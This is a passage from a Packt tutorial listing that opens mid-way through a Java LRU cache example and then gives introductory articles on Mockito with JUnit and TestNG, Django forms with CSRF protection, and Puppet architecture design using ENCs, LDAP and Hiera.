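    public ProductCatalogCache(int capacity) {
        // initial capacity, load factor, accessOrder=true for LRU behavior
        super(16, 0.75f, true);
        this.capacity = capacity;
    }

    @Override
    protected boolean removeEldestEntry(Map.Entry<K, V> eldest) {
        // Returning true tells LinkedHashMap to drop the eldest (least
        // recently accessed) entry, which implements the LRU policy.
        return size() > capacity;
    }

    public static void main(String[] args) {
        ProductCatalogCache<String, String> cache = new ProductCatalogCache<>(2);
        cache.put("P1", "Laptop");
        cache.put("P2", "Phone");
        cache.get("P1");              // P1 becomes the most recently used
        cache.put("P3", "Tablet");    // evicts P2, the least recently used
        System.out.println(cache.keySet()); // prints [P1, P3]
    }
}

Bounding the size in this way addresses the too-big-cache concern, and the access-order constructor flag gives the LRU replacement behavior described above; in a real application, access to such a map would also have to be made thread safe (for example, with Collections.synchronizedMap) or replaced with a dedicated caching library.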

Getting Started with Mockito

Packt
19 Jun 2014
14 min read
(For more resources related to this topic, see here.) Mockito is an open source framework for Java that allows you to easily create test doubles (mocks). What makes Mockito so special is that it eliminates the common expect-run-verify pattern (which was present, for example, in EasyMock—please refer to http://monkeyisland.pl/2008/02/24/can-i-test-what-i-want-please for more details) that in effect leads to a lower coupling of the test code to the production code as such. In other words, one does not have to define the expectations of how the mock should behave in order to verify its behavior. That way, the code is clearer and more readable for the user. On one hand, Mockito has a very active group of contributors and is actively maintained. On the other hand, by the time this article is written, the last Mockito release (Version 1.9.5) would have been in October 2012. You may ask yourself the question, "Why should I even bother to use Mockito in the first place?" Out of many, Mockito offers the following key features: There is no expectation phase for Mockito—you can either stub or verify the mock's behavior You are able to mock both interfaces and classes You can produce little boilerplate code while working with Mockito by means of annotations You can easily verify or stub with intuitive argument matchers Before diving into Mockito as such, one has to understand the concept behind System Under Test (SUT) and test doubles. We will base on what Gerard Meszaros has defined in the xUnit Patterns (http://xunitpatterns.com/Mocks,%20Fakes,%20Stubs%20and%20Dummies.html). SUT (http://xunitpatterns.com/SUT.html) describes the system that we are testing. It doesn't have to necessarily signify a class but any part of the application that we are testing or even the whole application as such. As for test doubles (http://www.martinfowler.com/bliki/TestDouble.html), it's an object that is used only for testing purposes, instead of a real object. Let's take a look at different types of test doubles: Dummy: This is an object that is used only for the code to compile—it doesn't have any business logic (for example, an object passed as a parameter to a method) Fake: This is an object that has an implementation but it's not production ready (for example, using an in-memory database instead of communicating with a standalone one) Stub: This is an object that has predefined answers to method executions made during the test Mock: This is an object that has predefined answers to method executions made during the test and has recorded expectations of these executions Spy: These are objects that are similar to stubs, but they additionally record how they were executed (for example, a service that holds a record of the number of sent messages) An additional remark is also related to testing the output of our application. The more decoupled your test code is from your production code, the better since you will have to spend less time (or even none) on modifying your tests after you change the implementation of the code. Coming back to the article's content—this article is all about getting started with Mockito. We will begin with how to add Mockito to your classpath. Then, we'll see a simple setup of tests for both JUnit and TestNG test frameworks. Next, we will check why it is crucial to assert the behavior of the system under test instead of verifying its implementation details. Finally, we will check out some of Mockito's experimental features, adding hints and warnings to the exception messages. 
The very idea of the following recipes is to prepare your test classes to work with Mockito and to show you how to do this with as little boilerplate code as possible. Due to my fondness of the behavior driven development (http://dannorth.net/introducing-bdd/ first introduced by Dan North), I'm using Mockito's BDDMockito and AssertJ's BDDAssertions static methods to make the code even more readable and intuitive in all the test cases. Also, please read Szczepan Faber's blog (author of Mockito) about the given, when, then separation in your test methods—http://monkeyisland.pl/2009/12/07/given-when-then-forever/—since these are omnipresent throughout the article. I don't want the article to become a duplication of the Mockito documentation, which is of high quality—I would like you to take a look at good tests and get acquainted with Mockito syntax from the beginning. What's more, I've used static imports in the code to make it even more readable, so if you get confused with any of the pieces of code, it would be best to consult the repository and the code as such. Adding Mockito to a project's classpath Adding Mockito to a project's classpath is as simple as adding one of the two jars to your project's classpath: mockito-all: This is a single jar with all dependencies (with the hamcrest and objenesis libraries—as of June 2011). mockito-core: This is only Mockito core (without hamcrest or objenesis). Use this if you want to control which version of hamcrest or objenesis is used. How to do it... If you are using a dependency manager that connects to the Maven Central Repository, then you can get your dependencies as follows (examples of how to add mockito-all to your classpath for Maven and Gradle): For Maven, use the following code: <dependency> <groupId>org.mockito</groupId> <artifactId>mockito-all</artifactId> <version>1.9.5</version> <scope>test</scope> </dependency> For Gradle, use the following code: testCompile "org.mockito:mockito-all:1.9.5" If you are not using any of the dependency managers, you have to either download mockito-all.jar or mockito-core.jar and add it to your classpath manually (you can download the jars from https://code.google.com/p/mockito/downloads/list). Getting started with Mockito for JUnit Before going into details regarding Mockito and JUnit integration, it is worth mentioning a few words about JUnit. JUnit is a testing framework (an implementation of the xUnit famework) that allows you to create repeatable tests in a very readable manner. In fact, JUnit is a port of Smalltalk's SUnit (both the frameworks were originally implemented by Kent Beck). What is important in terms of JUnit and Mockito integration is that under the hood, JUnit uses a test runner to run its tests (from xUnit—test runner is a program that executes the test logic and reports the test results). Mockito has its own test runner implementation that allows you to reduce boilerplate in order to create test doubles (mocks and spies) and to inject them (either via constructors, setters, or reflection) into the defined object. What's more, you can easily create argument captors. 
All of this is feasible by means of proper annotations as follows: @Mock: This is used for mock creation @Spy: This is used to create a spy instance @InjectMocks: This is used to instantiate the @InjectMock annotated field and inject all the @Mock or @Spy annotated fields into it (if applicable) @Captor: This is used to create an argument captor By default, you should profit from Mockito's annotations to make your code look neat and to reduce the boilerplate code in your application. Getting ready In order to add JUnit to your classpath, if you are using a dependency manager that connects to the Maven Central Repository, then you can get your dependencies as follows (examples for Maven and Gradle): To add JUnit in Maven, use the following code: <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>4.11</version> <scope>test</scope> </dependency> To add JUnit in Gradle, use the following code: testCompile('junit:junit:4.11') If you are not using any of the dependency managers, you have to download the following jars: junit.jar hamcrest-core.jar Add the downloaded files to your classpath manually (you can download the jars from https://github.com/junit-team/junit/wiki/Download-and-Install). For this recipe, our system under test will be a MeanTaxFactorCalculator class that will call an external service, TaxService, to get the current tax factor for the current user. It's a tax factor and not tax as such since, for simplicity, we will not be using BigDecimals but doubles, and I'd never suggest using doubles to anything related to money, as follows: public class MeanTaxFactorCalculator { private final TaxService taxService; public MeanTaxFactorCalculator(TaxService taxService) { this.taxService = taxService; } public double calculateMeanTaxFactorFor(Person person) { double currentTaxFactor = taxService.getCurrentTaxFactorFor(person); double anotherTaxFactor = taxService.getCurrentTaxFactorFor(person); return (currentTaxFactor + anotherTaxFactor) / 2; } } How to do it... To use Mockito's annotations, you have to perform the following steps: Annotate your test with the @RunWith(MockitoJUnitRunner.class). Annotate the test fields with the @Mock or @Spy annotation to have either a mock or spy object instantiated. Annotate the test fields with the @InjectMocks annotation to first instantiate the @InjectMock annotated field and then inject all the @Mock or @Spy annotated fields into it (if applicable). The following snippet shows the JUnit and Mockito integration in a test class that verifies the SUT's behavior (remember that I'm using BDDMockito.given(...) and AssertJ's BDDAssertions.then(...) static methods: @RunWith(MockitoJUnitRunner.class) public class MeanTaxFactorCalculatorTest { static final double TAX_FACTOR = 10; @Mock TaxService taxService; @InjectMocks MeanTaxFactorCalculator systemUnderTest; @Test public void should_calculate_mean_tax_factor() { // given given(taxService.getCurrentTaxFactorFor(any(Person.class))).willReturn(TAX_FACTOR); // when double meanTaxFactor = systemUnderTest.calculateMeanTaxFactorFor(new Person()); // then then(meanTaxFactor).isEqualTo(TAX_FACTOR); } } To profit from Mockito's annotations using JUnit, you just have to annotate your test class with @RunWith(MockitoJUnitRunner.class). How it works... The Mockito test runner will adapt its strategy depending on the version of JUnit. 
If there exists a org.junit.runners.BlockJUnit4ClassRunner class, it means that the codebase is using at least JUnit in Version 4.5.What eventually happens is that the MockitoAnnotations.initMocks(...) method is executed for the given test, which initializes all the Mockito annotations (for more information, check the subsequent There's more… section). There's more... You may have a situation where your test class has already been annotated with a @RunWith annotation and seemingly, you may not profit from Mockito's annotations. In order to achieve this, you have to call the MockitoAnnotations.initMocks method manually in the @Before annotated method of your test, as shown in the following code: public class MeanTaxFactorCalculatorTest { static final double TAX_FACTOR = 10; @Mock TaxService taxService; @InjectMocks MeanTaxFactorCalculator systemUnderTest; @Before public void setup() { MockitoAnnotations.initMocks(this); } @Test public void should_calculate_mean_tax_factor() { // given given(taxService.getCurrentTaxFactorFor(Mockito.any(Person.class))).willReturn(TAX_FACTOR); // when double meanTaxFactor = systemUnderTest.calculateMeanTaxFactorFor(new Person()); // then then(meanTaxFactor).isEqualTo(TAX_FACTOR); } } To use Mockito's annotations without a JUnit test runner, you have to call the MockitoAnnotations.initMocks method and pass the test class as its parameter. Mockito checks whether the user has overridden the global configuration of AnnotationEngine, and if this is not the case, the InjectingAnnotationEngine implementation is used to process annotations in tests. What is done internally is that the test class fields are scanned for annotations and proper test doubles are initialized and injected into the @InjectMocks annotated object (either by a constructor, property setter, or field injection, in that precise order). You have to remember several factors related to the automatic injection of test doubles as follows: If Mockito is not able to inject test doubles into the @InjectMocks annotated fields through either of the strategies, it won't report failure—the test will continue as if nothing happened (and most likely, you will get NullPointerException). For constructor injection, if arguments cannot be found, then null is passed For constructor injection, if nonmockable types are required in the constructor, then the constructor injection won't take place. For other injection strategies, if you have properties with the same type (or same erasure) and if Mockito matches mock names with a field/property name, it will inject that mock properly. Otherwise, the injection won't take place. For other injection strategies, if the @InjectMocks annotated object wasn't previously initialized, then Mockito will instantiate the aforementioned object using a no-arg constructor if applicable. See also JUnit documentation at https://github.com/junit-team/junit/wiki Martin Fowler's article on xUnit at http://www.martinfowler.com/bliki/Xunit.html Gerard Meszaros's xUnit Test Patterns at http://xunitpatterns.com/ @InjectMocks Mockito documentation (with description of injection strategies) at http://docs.mockito.googlecode.com/hg/1.9.5/org/mockito/InjectMocks.html Getting started with Mockito for TestNG Before going into details regarding Mockito and TestNG integration, it is worth mentioning a few words about TestNG. 
TestNG is a unit testing framework for Java that was created, as the author explains on the tool's website (refer to the See also section for the link), out of frustration with some JUnit deficiencies. TestNG was inspired by both JUnit and NUnit, and it aims at covering the whole scope of testing: unit, functional, integration, end-to-end tests, and so on. The JUnit library, however, was initially created for unit testing only. The main differences between JUnit and TestNG are as follows:

The TestNG author disliked JUnit's approach of having to define some methods as static in order to be executed before the test class logic gets executed (for example, the @BeforeClass annotated methods); that's why in TestNG you don't have to define these methods as static
TestNG has more annotations related to method execution before single tests, suites, and test groups
TestNG annotations are more descriptive in terms of what they do; for example, JUnit's @Before versus TestNG's @BeforeMethod

Mockito in Version 1.9.5 doesn't provide any out-of-the-box solution to integrate with TestNG in a simple way, but there is a special Mockito subproject for TestNG (refer to the See also section for the URL) that should become part of one of the subsequent Mockito releases. In the following recipe, we will take a look at how to profit from that code and that very elegant solution.

Getting ready

When you take a look at Mockito's TestNG subproject on the Mockito GitHub repository, you will find that there are three classes in the org.mockito.testng package, as follows:

MockitoAfterTestNGMethod
MockitoBeforeTestNGMethod
MockitoTestNGListener

Unfortunately, until this project eventually gets released, you have to copy and paste those classes to your codebase.

How to do it...

To integrate TestNG and Mockito, perform the following steps:

Copy the MockitoAfterTestNGMethod, MockitoBeforeTestNGMethod, and MockitoTestNGListener classes to your codebase from Mockito's TestNG subproject.
Annotate your test class with @Listeners(MockitoTestNGListener.class).
Annotate the test fields with the @Mock or @Spy annotation to have either a mock or a spy object instantiated.
Annotate the test fields with the @InjectMocks annotation to first instantiate the @InjectMocks annotated field and inject all the @Mock or @Spy annotated fields into it (if applicable).
Annotate the test fields with the @Captor annotation to make Mockito instantiate an argument captor.

Now let's take a look at this snippet that, using TestNG, checks whether the mean tax factor value has been calculated properly (remember that I'm using the BDDMockito.given(...) and AssertJ's BDDAssertions.then(...) static methods):

@Listeners(MockitoTestNGListener.class)
public class MeanTaxFactorCalculatorTestNgTest {

    static final double TAX_FACTOR = 10;

    @Mock TaxService taxService;

    @InjectMocks MeanTaxFactorCalculator systemUnderTest;

    @Test
    public void should_calculate_mean_tax_factor() {
        // given
        given(taxService.getCurrentTaxFactorFor(any(Person.class))).willReturn(TAX_FACTOR);

        // when
        double meanTaxFactor = systemUnderTest.calculateMeanTaxFactorFor(new Person());

        // then
        then(meanTaxFactor).isEqualTo(TAX_FACTOR);
    }
}

How it works...

TestNG allows you to register custom listeners (your listener class has to implement the IInvokedMethodListener interface). Once you do this, the logic inside the implemented methods will be executed before and after every configuration and test method gets called.
Mockito provides you with a listener whose responsibilities are as follows: Initialize mocks annotated with the @Mock annotation (it is done only once) Validate the usage of Mockito after each test method Remember that with TestNG, all mocks are reset (or initialized if it hasn't already been done so) before any TestNG method! See also The TestNG homepage at http://testng.org/doc/index.html The Mockito TestNG subproject at https://github.com/mockito/mockito/tree/master/subprojects/testng The Getting started with Mockito for JUnit recipe on the @InjectMocks analysis
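Both recipes mention the @Captor annotation but never show it in use. The following is a minimal, hypothetical sketch (not taken from the article): the TaxAuditService interface, the AuditingCalculator class, and the recordAudit(...) method are invented for illustration, while Person, the annotations, and the runner come from the recipes above. It shows how an injected ArgumentCaptor lets you inspect the exact argument passed to a mocked dependency:

import static org.assertj.core.api.Assertions.assertThat;
import static org.mockito.Mockito.verify;

import org.junit.Test;
import org.junit.runner.RunWith;
import org.mockito.ArgumentCaptor;
import org.mockito.Captor;
import org.mockito.InjectMocks;
import org.mockito.Mock;
import org.mockito.runners.MockitoJUnitRunner;

@RunWith(MockitoJUnitRunner.class)
public class AuditingCalculatorTest {

    // Hypothetical collaborator and SUT, introduced only for this illustration
    interface TaxAuditService {
        void recordAudit(Person person);
    }

    static class AuditingCalculator {
        private final TaxAuditService auditService;
        AuditingCalculator(TaxAuditService auditService) {
            this.auditService = auditService;
        }
        void auditFor(Person person) {
            auditService.recordAudit(person);
        }
    }

    @Mock TaxAuditService auditService;
    @InjectMocks AuditingCalculator systemUnderTest;
    @Captor ArgumentCaptor<Person> personCaptor;

    @Test
    public void should_pass_the_person_to_the_audit_service() {
        // given
        Person person = new Person();

        // when
        systemUnderTest.auditFor(person);

        // then - capture the argument passed to the mocked dependency
        verify(auditService).recordAudit(personCaptor.capture());
        assertThat(personCaptor.getValue()).isSameAs(person);
    }
}

The same pattern works with the TestNG listener shown above; only the runner or listener wiring differs, since in both cases the @Captor annotated field is initialized for you before the test method runs.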

Adding a developer with Django forms

Packt
18 Jun 2014
8 min read
(For more resources related to this topic, see here.) When displaying the form, it will generate the contents of the form template. We may change the type of field that the object sends to the template if needed. While receiving the data, the object will check the contents of each form element. If there is an error, the object will send a clear error to the client. If there is no error, we are certain that the form data is correct. CSRF protection Cross-Site Request Forgery (CSRF) is an attack that targets a user who is loading a page that contains a malicious request. The malicious script uses the authentication of the victim to perform unwanted actions, such as changing data or access to sensitive data. The following steps are executed during a CSRF attack: Script injection by the attacker. An HTTP query is performed to get a web page. Downloading the web page that contains the malicious script. Malicious script execution. In this kind of attack, the hacker can also modify information that may be critical for the users of the website. Therefore, it is important for a web developer to know how to protect their site from this kind of attack, and Django will help with this. To re-enable CSRF protection, we must edit the settings.py file and uncomment the following line: 'django.middleware.csrf.CsrfViewMiddleware', This protection ensures that the data that has been sent is really sent from a specific property page. You can check this in two easy steps: When creating an HTML or Django form, we insert a CSRF token that will store the server. When the form is sent, the CSRF token will be sent too. When the server receives the request from the client, it will check the CSRF token. If it is valid, it validates the request. Do not forget to add the CSRF token in all the forms of the site where protection is enabled. HTML forms are also involved, and the one we have just made does not include the token. For the previous form to work with CSRF protection, we need to add the following line in the form of tags and <form> </form>: {% csrf_token %} The view with a Django form We will first write the view that contains the form because the template will display the form defined in the view. Django forms can be stored in other files as forms.py at the root of the project file. We include them directly in our view because the form will only be used on this page. Depending on the project, you must choose which architecture suits you best. We will create our view in the views/create_developer.py file with the following lines: from django.shortcuts import render from django.http import HttpResponse from TasksManager.models import Supervisor, Developer from django import forms # This line imports the Django forms package class Form_inscription(forms.Form): # This line creates the form with four fields. It is an object that inherits from forms.Form. It contains attributes that define the form fields. name = forms.CharField(label="Name", max_length=30) login = forms.CharField(label="Login", max_length=30) password = forms.CharField(label="Password", widget=forms.PasswordInput) supervisor = forms.ModelChoiceField(label="Supervisor", queryset=Supervisor.objects.all()) # View for create_developer def page(request): if request.POST: form = Form_inscription(request.POST) # If the form has been posted, we create the variable that will contain our form filled with data sent by POST form. 
The view with a Django form

We will first write the view that contains the form, because the template will display the form defined in the view. Django forms can also be stored in separate files, such as a forms.py file at the root of the application. We include the form directly in our view because it will only be used on this page. Depending on the project, you must choose which architecture suits you best. We will create our view in the views/create_developer.py file with the following lines:

    from django.shortcuts import render
    from django.http import HttpResponse
    from TasksManager.models import Supervisor, Developer
    # This line imports the Django forms package
    from django import forms

    # This class creates the form with four fields. It is an object that inherits from
    # forms.Form and contains attributes that define the form fields.
    class Form_inscription(forms.Form):
        name       = forms.CharField(label="Name", max_length=30)
        login      = forms.CharField(label="Login", max_length=30)
        password   = forms.CharField(label="Password", widget=forms.PasswordInput)
        supervisor = forms.ModelChoiceField(label="Supervisor", queryset=Supervisor.objects.all())

    # View for create_developer
    def page(request):
        if request.POST:
            # If the form has been posted, we create the variable that will contain
            # our form filled with the data sent by POST.
            form = Form_inscription(request.POST)
            if form.is_valid():
                # This checks that the data sent by the user is consistent with the
                # fields defined in the form. The collected data is filtered by the
                # clean() method, so cleaned_data provides secure data.
                name = form.cleaned_data['name']
                login = form.cleaned_data['login']
                password = form.cleaned_data['password']
                # The supervisor variable is of the Supervisor type; the value returned
                # by the cleaned_data dictionary is directly a model instance.
                supervisor = form.cleaned_data['supervisor']
                new_developer = Developer(name=name, login=login, password=password, email="", supervisor=supervisor)
                new_developer.save()
                return HttpResponse("Developer added")
            else:
                # To send the form to the template, just send it like any other variable.
                # We send it when the form is not valid in order to display the errors to the user.
                return render(request, 'en/public/create_developer.html', {'form': form})
        else:
            # In this case, the user has not yet submitted the form; it is instantiated with no data inside.
            form = Form_inscription()
            return render(request, 'en/public/create_developer.html', {'form': form})

When validation fails, the form is displayed again with an error message.

Template of a Django form

We set the template for this view. The template will be much shorter:

    {% extends "base.html" %}
    {% block title_html %}
        Create Developer
    {% endblock %}
    {% block h1 %}
        Create Developer
    {% endblock %}
    {% block article_content %}
        <form method="post" action="{% url "create_developer" %}" >
            {% csrf_token %} <!-- This line inserts a CSRF token. -->
            <table>
                {{ form.as_table }} <!-- This line displays the rows of the form. -->
            </table>
            <p><input type="submit" value="Create" /></p>
        </form>
    {% endblock %}

As the complete form operation is in the view, the template simply executes the as_table method to generate the HTML form. The previous code displays the data in tabular form. The three methods to generate an HTML form structure are as follows:

- as_table: This displays the fields in <tr> <td> tags
- as_ul: This displays the form fields in <li> tags
- as_p: This displays the form fields in <p> tags

So, we quickly wrote a secure form with error handling and CSRF protection through Django forms.
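If more control over the markup is needed than as_table, as_ul, or as_p provide, each field can also be rendered individually in the template. The following sketch is not part of the original example; it only illustrates the idea for the name field of our Form_inscription form:

    {% block article_content %}
        <form method="post" action="{% url "create_developer" %}" >
            {% csrf_token %}
            <p>
                {{ form.name.errors }}     <!-- Validation errors for this field -->
                {{ form.name.label_tag }}  <!-- The <label> element -->
                {{ form.name }}            <!-- The <input> element itself -->
            </p>
            <p><input type="submit" value="Create" /></p>
        </form>
    {% endblock %}

The other fields would be rendered the same way; the automatic methods remain the quicker choice when the default layout is acceptable.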
The form based on a model

ModelForms are Django forms based on models. The fields of these forms are automatically generated from the model that we have defined. Indeed, developers are often required to create forms with fields that correspond to those in the database, even for a non-MVC website. These particular forms have a save() method that saves the form data in a new record.

The supervisor creation form

To broach ModelForms, we will take, for example, the addition of a supervisor. For this, we will create a new page with the following URL:

    url(r'^create-supervisor$', 'TasksManager.views.create_supervisor.page', name="create_supervisor"),

Our view will contain the following code:

    from django.shortcuts import render
    from TasksManager.models import Supervisor
    from django import forms
    from django.http import HttpResponseRedirect
    from django.core.urlresolvers import reverse

    def page(request):
        if len(request.POST) > 0:
            form = Form_supervisor(request.POST)
            if form.is_valid():
                # If the form is valid, we store the form data in a new model record.
                form.save(commit=True)
                # This line redirects to the specified URL. We use the reverse() function
                # to get the URL from the name defined in urls.py.
                return HttpResponseRedirect(reverse('public_index'))
            else:
                return render(request, 'en/public/create_supervisor.html', {'form': form})
        else:
            form = Form_supervisor()
            return render(request, 'en/public/create_supervisor.html', {'form': form})

    # Here we create a class that inherits from ModelForm.
    class Form_supervisor(forms.ModelForm):
        # We extend the Meta class of the ModelForm. This class allows us to define the properties of the ModelForm.
        class Meta:
            # We define the model on which the form is based.
            model = Supervisor
            # We exclude certain fields from this form. It would also have been possible to do
            # the opposite, that is, to list the desired fields with the fields property.
            exclude = ('date_created', 'last_connexion', )

As seen in the line exclude = ('date_created', 'last_connexion', ), it is possible to restrict the form fields. Both the exclude and fields properties must be used correctly. Indeed, these properties receive a tuple of the fields to exclude or include as arguments. They can be described as follows:

- exclude: This is used in the case of a form accessible to the administrator, because if you add a field to the model, it will automatically be included in the form.
- fields: This is used in the case of a form accessible to users. Indeed, if you add a field to the model, it will not be visible to the user.

For example, imagine a website selling royalty-free images with a registration form based on ModelForm. The administrator adds a credit field to the extended model of the user. If the developer had used the exclude property on some fields and did not add credits to it, the user would be able to give themselves as many credits as they want.

We will reuse our previous template, changing only the URL in the action attribute of the <form> tag:

    {% url "create_supervisor" %}

This example shows us that ModelForms can save a lot of development time by providing a form that can still be customized (by modifying the validation, for example).

Summary

This article discussed Django forms. It explained how to create forms with Django and how to process them.

Resources for Article:

Further resources on this subject:
So, what is Django? [article]
Creating an Administration Interface in Django [article]
Django Debugging Overview [article]
Designing Puppet Architectures

Packt
18 Jun 2014
21 min read
(For more resources related to this topic, see here.)

Puppet is an extensible automation framework, a tool, and a language. We can do great things with it, and we can do them in many different ways. Besides the technicalities of learning the basics of its DSL, one of the biggest challenges for new and not-so-new users of Puppet is to organize code and put things together in a manageable and appropriate way. It's hard to find comprehensive documentation on how to use public code (modules) with our custom modules and data, where to place our logic, how to maintain and scale it, and generally, how to manage the resources that we want in our nodes and the data that defines them safely and effectively.

There's not really a single answer that fits all these cases. There are best practices, recommendations, and many debates in the community, but ultimately, it all depends on our own needs and infrastructure, which vary according to multiple factors, such as the following:

- The number and variety of nodes and application stacks to manage
- The infrastructure design and number of data centers or separate networks to manage
- The number and skills of people who work with Puppet
- The number of teams who work with Puppet
- Puppet's presence and integration with other tools
- Policies for change in production

In this article, we will outline the elements needed to design a Puppet architecture, reviewing the following elements in particular:

- The tasks to deal with (manage nodes, data, code, files, and so on) and the available components to manage them
- The Foreman, which is probably the most used ENC around, together with Puppet Enterprise
- The pattern of roles and profiles
- Data separation challenges and issues
- How the various components can be used together in different ways, with some sample setups

The components of Puppet architecture

With Puppet, we manage our systems via the catalog that the Puppet Master compiles for each node. This is the total of the resources we have declared in our code, based on the parameters and variables whose values reflect our logic and needs. Most of the time, we also provide configuration files, either as static files or via ERB templates populated according to the variables we have set.

We can identify the following major tasks when we have to manage what we want to configure on our nodes:

- Definition of the classes to be included in each node
- Definition of the parameters to use for each node
- Definition of the configuration files provided to the nodes

These tasks can be provided by different, partly interchangeable components, which are as follows:

- site.pp is the first file parsed by the Puppet Master (by default, its path is /etc/puppet/manifests/site.pp) and, eventually, all the files that are imported from there (import nodes/*.pp would import and parse all the files with the .pp suffix in the /etc/puppet/manifests/nodes/ directory). Here, we have code in the Puppet language.

- An ENC (External Node Classifier) is an alternative source that can be used to define the classes and parameters to apply to nodes. It's enabled with the following lines in the Puppet Master's puppet.conf:

    [master]
    node_terminus = exec
    external_nodes = /etc/puppet/node.rb

  The script referenced by the external_nodes parameter can be any script that uses any backend; it's invoked with the client's certname as the first argument (/etc/puppet/node.rb web01.example.com) and should return YAML-formatted output that defines the classes to include for that node, the parameters, and the Puppet environment to use.
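As an illustration (not from the original text), a minimal exec ENC could be a simple Ruby script that prints the expected YAML for every node; the class names and parameters here are placeholders:

    #!/usr/bin/env ruby
    # /etc/puppet/node.rb - minimal ENC sketch; ARGV[0] is the node's certname
    require 'yaml'

    certname = ARGV[0]
    output = {
      'classes'     => ['general'],
      'parameters'  => { 'enc_managed' => true, 'certname' => certname },
      'environment' => 'production'
    }
    puts output.to_yaml

A real ENC would look the certname up in whatever backend holds the node data (a database, a CMDB, an inventory tool) instead of returning static values.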
  Besides well-known Puppet-specific ENCs such as The Foreman and Puppet Dashboard (a former Puppet Labs project now maintained by community members), it's not uncommon to write new custom ones that leverage existing tools and infrastructure-management solutions.

- LDAP can be used to store node information (classes, environment, and variables) as an alternative to an ENC. To enable LDAP integration, add the following lines to the Master's puppet.conf:

    [master]
    node_terminus = ldap
    ldapserver = ldap.example.com
    ldapbase = ou=Hosts,dc=example,dc=com

  Then, we have to add Puppet's schema to our LDAP server. For more information and details, refer to http://docs.puppetlabs.com/guides/ldap_nodes.html.

- Hiera is the hierarchical key-value datastore. It is embedded in Puppet 3 and available as an add-on for previous versions. Here, we can set parameters, but also include classes and eventually provide content for files.

- Public modules can be retrieved from Puppet Forge, GitHub, or other sources; they typically manage applications and system settings. Being public, they might not fit all our custom needs, but they are supposed to be reusable, support different OSes, and adapt to different usage cases. We are supposed to be able to use them without any modification, as if they were public libraries, committing our fixes and enhancements back to the upstream repository. A common but less-recommended alternative is to fork a public module and adapt it to our needs. This might seem a quicker solution, but it doesn't help the open source ecosystem and prevents us from benefiting from updates to the original repository.

- Site module(s) are custom modules with local resources and files where we can place all the logic we need or the resources we can't manage with public modules. There may be one or more of them, and they may be called site or have the name of our company, customer, or project. Site modules make particular sense as a companion to public modules when the latter are used without local modifications. In site modules, we can place local settings, files, custom logic, and resources. The distinction between public reusable modules and site modules is purely formal; they are both Puppet modules with a standard structure. It might make sense to place the ones we develop internally in a dedicated directory (module path), different from the one where we place shared modules downloaded from public sources.

Let's see how these components might fit our Puppet tasks.

Defining the classes to include in each node

This is typically what we mean when we talk about node classification in Puppet. This is the task that the Puppet Master accomplishes when it receives a request from a client node and has to determine the classes and parameters to use for that specific node. Node classification can be done in the following different ways:

- We can use the node declaration in site.pp and other manifests eventually imported from there. In this way, we identify each node by certname and declare all the resources and classes we want for it, as shown in the following code:

    node 'web01.example.com' {
      include ::general
      include ::apache
    }

  Here, we may even decide to follow a nodeless layout, where we don't use the node declaration at all and rely on facts to manage the classes and parameters to be assigned to our nodes. An example of this approach is examined later in this article.

- On an ENC, we can define the classes (and parameters) that each node should have.
  The returned YAML for our simple case would be something like the following:

    ---
    classes:
      - general:
      - apache:
    parameters:
      dns_servers:
        - 8.8.8.8
        - 8.8.4.4
      smtp_server: smtp.example.com
    environment: production

- Via LDAP, we can have a hierarchical structure where a node can inherit the classes (referenced with the puppetClass attribute) set in a parent node (parentNode).

- Via Hiera, using the hiera_include function: just add the following to site.pp:

    hiera_include('classes')

  Then, in our hierarchy, define under the key named classes what to include for each node. For example, with a YAML backend, our case would be represented with the following lines of code:

    ---
    classes:
      - general
      - apache

- In site module(s), any custom logic can be placed, for example, the classes and resources to include for all the nodes or for specific groups of nodes.

Defining the parameters to use for each node

This is another crucial part, as with parameters we can characterize our nodes and define the resources we want for them. Generally, to identify and characterize a node in order to differentiate it from the others and provide the specific resources we want for it, we need very few key parameters, such as the following (the names used here may be common but are arbitrary and are not Puppet's internal ones):

- role is almost a de facto standard name to identify the kind of server. A node is supposed to have just one role, which might be something like webserver, app_be, db, or anything that identifies the function of the node. Note that web servers that serve different web applications should have different roles (that is, webserver_site, webserver_blog, and so on). We can have one or more nodes with the same role.
- env, or any name that identifies the operational environment of the node (whether it is a development, test, QA, or production server). Note that this doesn't necessarily match Puppet's internal environment variable. Some people prefer to merge the env information into role, having roles such as webserver_prod and webserver_devel.
- zone, site, data center, country, or any parameter that identifies the network, country, availability zone, or data center where the node is placed. A node is supposed to belong to only one of these. We might not need this in our infrastructure.
- tenant, component, application, project, and cluster might be other kinds of variables that characterize our node. There's no real standard for their naming, and their usage and necessity strictly depend on the underlying infrastructure.

With parameters such as these, any node can be fully identified and served with its specific configuration. It makes sense to provide them, where possible, as facts. The parameters we use in our manifests may have a different nature:

- role/env/zone as defined earlier are used to identify the nodes; they are typically used to determine the values of other parameters
- OS-related parameters, such as package names and file paths
- Parameters that define the services of our infrastructure (DNS servers, NTP servers, and so on)
- Usernames and passwords, which should be reserved and used to manage credentials
- Parameters that express any further custom logic and classifying need (master, slave, host_number, and so on)
- Parameters exposed by the parameterized classes or defines we use

Often, the value of some parameters depends on the value of other ones. For example, the DNS or NTP server may change according to the zone or region of a node.
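To make this concrete, here is a hypothetical hiera.yaml (not taken from the article) where the hierarchy is driven by the identifying variables described above; the exact paths and variable names depend on how we expose role, env, and zone (as facts or top scope variables):

    ---
    :backends:
      - yaml
    :yaml:
      :datadir: /etc/puppet/hieradata
    :hierarchy:
      - "nodes/%{::clientcert}"
      - "role/%{::role}-%{::env}"
      - "role/%{::role}"
      - "zone/%{::zone}"
      - common

With such a hierarchy, a key like dns_server can be set once in common.yaml and overridden per zone or per role only where needed.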
When we start to design our Puppet architecture, it's important to have a general idea of the variations involved and the possible exceptions, as we will probably define our logic according to them. As a general rule, we will use the identifying parameters (role/env/zone) to define most of the other parameters most of the time, so we'll probably need to use them in our Hiera hierarchy or in Puppet selectors. This also means that we will probably need to set them as top scope variables (for example, via an ENC) or facts.

As with the classes that have to be included, parameters may be set by various components; some of them are actually the same since, in Puppet, a node's classification involves both the classes to include and the parameters to apply. These components are:

- In site.pp, we can set variables. If they are outside node definitions, they are at top scope; if they are inside, they are at node scope. Top scope variables should be referenced with a :: prefix, for example, $::role. Node scope variables are available inside the node's classes with their plain name, for example, $role.
- An ENC returns parameters, treated as top scope variables, alongside classes, and the logic of how they can be set depends entirely on its structure. Popular ENCs such as The Foreman, Puppet Dashboard, and the Puppet Enterprise Console allow users to set variables for single nodes or for groups, often in a hierarchical fashion. The kind and amount of parameters set here depend on how much information we want to manage on the ENC and how much to manage somewhere else.
